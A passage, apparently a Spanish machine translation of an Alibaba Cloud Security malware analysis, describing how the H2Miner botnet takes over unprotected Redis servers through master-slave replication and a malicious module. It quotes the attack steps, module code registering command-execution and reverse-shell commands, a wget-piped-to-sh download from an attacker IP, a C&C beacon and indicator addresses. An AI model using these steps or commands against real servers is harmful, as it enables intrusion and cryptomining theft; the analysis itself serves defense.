Hace un día, uno de los servidores de mi proyecto fue atacado por un gusano similar. En busca de una respuesta a la pregunta “¿qué fue eso?” Encontré un gran artículo del equipo de Alibaba Cloud Security. Como no encontré este artículo sobre Habré, decidí traducirlo especialmente para ti <3
Entrada
Recientemente, el equipo de seguridad de Alibaba Cloud descubrió un brote repentino de H2Miner. Este tipo de gusano malicioso utiliza la falta de autorización o contraseñas débiles de Redis como puerta de enlace a sus sistemas, después de lo cual sincroniza su propio módulo malicioso con el esclavo mediante sincronización maestro-esclavo y finalmente descarga este módulo malicioso en la máquina atacada y ejecuta el malware. instrucciones.
En el pasado, los ataques a sus sistemas se llevaban a cabo principalmente mediante un método que involucraba tareas programadas o claves SSH que se escribían en su máquina después de que el atacante iniciaba sesión en Redis. Afortunadamente, este método no se puede utilizar con frecuencia debido a problemas de control de permisos o debido a diferentes versiones del sistema. Sin embargo, este método de cargar un módulo malicioso puede ejecutar directamente los comandos del atacante u obtener acceso al shell, lo cual es peligroso para su sistema.
Debido a la gran cantidad de servidores Redis alojados en Internet (casi 1 millón), el equipo de seguridad de Alibaba Cloud, como recordatorio amistoso, recomienda que los usuarios no compartan Redis en línea y verifiquen periódicamente la seguridad de sus contraseñas y si están comprometidas. selección rápida.
H2Miner
H2Miner es una botnet de minería para sistemas basados en Linux que puede invadir su sistema de diversas formas, incluida la falta de autorización en las vulnerabilidades de ejecución remota de comandos (RCE) de Hadoop Yarn, Docker y Redis. Una botnet funciona descargando scripts maliciosos y malware para extraer sus datos, expandir el ataque horizontalmente y mantener comunicaciones de comando y control (C&C).
Redis RCE
Pavel Toporkov compartió conocimientos sobre este tema en ZeroNights 2018. Después de la versión 4.0, Redis admite una función de carga de complementos que brinda a los usuarios la capacidad de cargar archivos compilados con C en Redis para ejecutar comandos específicos de Redis. Esta función, aunque útil, contiene una vulnerabilidad en la que, en modo maestro-esclavo, los archivos se pueden sincronizar con el esclavo a través del modo fullresync. Un atacante puede utilizar esto para transferir archivos maliciosos. Una vez completada la transferencia, los atacantes cargan el módulo en la instancia de Redis atacada y ejecutan cualquier comando.
Análisis de gusanos maliciosos
Recientemente, el equipo de seguridad de Alibaba Cloud descubrió que el tamaño del grupo de mineros maliciosos H2Miner ha aumentado drásticamente de repente. Según el análisis, el proceso general de aparición del ataque es el siguiente:
H2Miner utiliza RCE Redis para un ataque completo. Los atacantes primero atacan servidores Redis desprotegidos o servidores con contraseñas débiles.
Luego usan el comando config set dbfilename red2.so para cambiar el nombre del archivo. Después de esto, los atacantes ejecutan el comando. slaveof para configurar la dirección del host de replicación maestro-esclavo.
Cuando la instancia de Redis atacada establece una conexión maestro-esclavo con el Redis malicioso propiedad del atacante, el atacante envía el módulo infectado utilizando el comando fullresync para sincronizar los archivos. Luego, el archivo red2.so se descargará en la máquina atacada. Luego, los atacantes utilizan el módulo de carga ./red2.so para cargar este archivo. El módulo puede ejecutar comandos de un atacante o iniciar una conexión inversa (puerta trasera) para obtener acceso a la máquina atacada.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Después de ejecutar un comando malicioso como / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, el atacante restablecerá el nombre del archivo de copia de seguridad y descargará el módulo del sistema para limpiar los rastros. Sin embargo, el archivo red2.so seguirá estando en la máquina atacada. Se recomienda a los usuarios que presten atención a la presencia de un archivo sospechoso en la carpeta de su instancia de Redis.
Además de eliminar algunos procesos maliciosos para robar recursos, el atacante siguió un script malicioso descargando y ejecutando archivos binarios maliciosos para . Esto significa que el nombre del proceso o el nombre del directorio que contiene parentesco en el host puede indicar que esa máquina ha sido infectada por este virus.
Según los resultados de la ingeniería inversa, el malware realiza principalmente las siguientes funciones:
- Subir archivos y ejecutarlos
- minería
- Mantener la comunicación C&C y ejecutar comandos de atacantes.
Utilice Masscan para escaneo externo para ampliar su influencia. Además, la dirección IP del servidor C&C está codificada en el programa y el host atacado se comunicará con el servidor de comunicación C&C mediante solicitudes HTTP, donde la información zombie (servidor comprometido) se identifica en el encabezado HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Otros métodos de ataque
Direcciones y enlaces utilizados por el gusano
/ parentesco
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
Carolina del Sur
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Consejo
En primer lugar, no se debe poder acceder a Redis desde Internet y se debe proteger con una contraseña segura. También es importante que los clientes verifiquen que no haya ningún archivo red2.so en el directorio de Redis y que no haya ningún "parentesco" en el nombre del archivo/proceso en el host.
Fuente: habr.com